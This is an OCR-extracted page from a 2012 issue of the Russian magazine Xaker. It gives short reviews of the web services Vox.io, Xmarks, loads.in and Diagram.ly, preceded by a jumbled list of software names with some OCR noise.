CrossLoop 2.82 Mathomatic 15.8.0 Trupax 6 Tunatic 1.1 mqj_cigçgçqo_ppgomaig
Fiddler 2.3.9.3 Openshot 1.4.2 uniofuzz VLC 2.0 !30ç.%4
Lanshark 0.0.2 Pinta 1.1 untidy WhatRoute 1.10.7
Lunascape 6.6.0 Spacefm 0.7.0 Vpnd 1.1.4
mRemote 1.50 Vlc 2.0.0 WeBaCoo 0.2.2
NetWorx 5.2.2 Windowmaker 0.95.2 zzuf 0.13
Omea Reader 2.2 Zile 2.4.6
Psi 0.14
x
UNITS / WWW2

WWW2
VOX.IO
vox.io
Похоже, что поиски достойной альтернативы Skype'у, которая не требовала бы уста-
новки десктопного клиента, успешно завершились. Vox.io работает через браузер и
позволяет бесплатно осуществлять видео- и голосовые звонки другим пользователям
сервиса, устраивать конференции с несколькими участниками и по вполне приемле-
мым ценам звонить на городские и мобильные телефоны. Чтобы позвонить на твой vox.
io-аккаунт не обязательно даже регистрироваться, — ты можешь расшарить специ-
альную ссылку, открыв которую, люди получат возможность быстро набрать твой
виртуальный номер. Кроме того, создатели сервиса активно занимаются разработкой
мобильных приложений для разных платформ, но пока релиз доступен только для iOS.
Skype в браузере

XMARKS
xmarks.com
Полезность этого сервиса для тебя определяется простым критерием: используешь
ли ты закладки? Xmarks умеет только одно — синхронизировать букмарки между ком-
пьютерами и разными браузерами (Firefox, Chrome, Internet Explorer и Safari), правда
для этого придется установить специальные расширения. Если заплатить неболь-
шую денежку (12$ в год), то можно синхронизировать закладки еще и с мобильными
устройствами. Тут стоит отметить, что инструменты реализованы очень качественно:
сразу чувствуется опыт разработчиков, в портфеле которых есть такой замечательный
сервис как менеджер паролей LastPass.
Грамотная синхронизация закладок

LOADS.IN
loads.in
Скорость работы сайта для пользователей из разных стран напрямую зависит от
географического расположения дата-центра, где находится хостинг. Чем дальше фи-
зически находится сервер, тем больше будет задержка при открытии сайта. Она может
быть и несущественной, но все равно чувствуется. Сервис loads.in позволяет прове-
рить скорость загрузки произвольного ресурса из самых разных точек мира. Причем
инструмент помимо сетевой задержки учитывает еще и время рендеринга страницы
браузером: можно сравнить замеры для Firefox, Chrome, Safari, Internet Explorer. К тому
же есть возможность посмотреть, как выглядел загружаемый сайт в каждый момент
загрузки - в виде последовательности скриншотов.
Бенчмарк для замера производительности сайта

DIAGRAMLY
Diagram.ly
Этот сервис будет далеко не первым среди онлайн-инструментов для создания раз-
личных диаграмм и схем, но что его отличает от многих других — так это максимальная
схожесть с известным Microsoft Visio. Это почти полная копия. Порой даже забываешь,
что имеешь дело не с обычной программой, а с онлайн-сервисом — настолько здоро-
во реализован интерфейс. Diagramly — настоящий must have на случай, если нужно
создать схему или иллюстрацию для курсовой или дипломной работы, статьи в журнале
или поста в блоге. Блок-схемы, диаграммы баз данных, схемы локальных сетей, схемы
электрических цепей — всего в базе Diagramly более 70 категорий элементов.
Редактор схем и диаграмм

144 ХАКЕР 04 /159/ 2012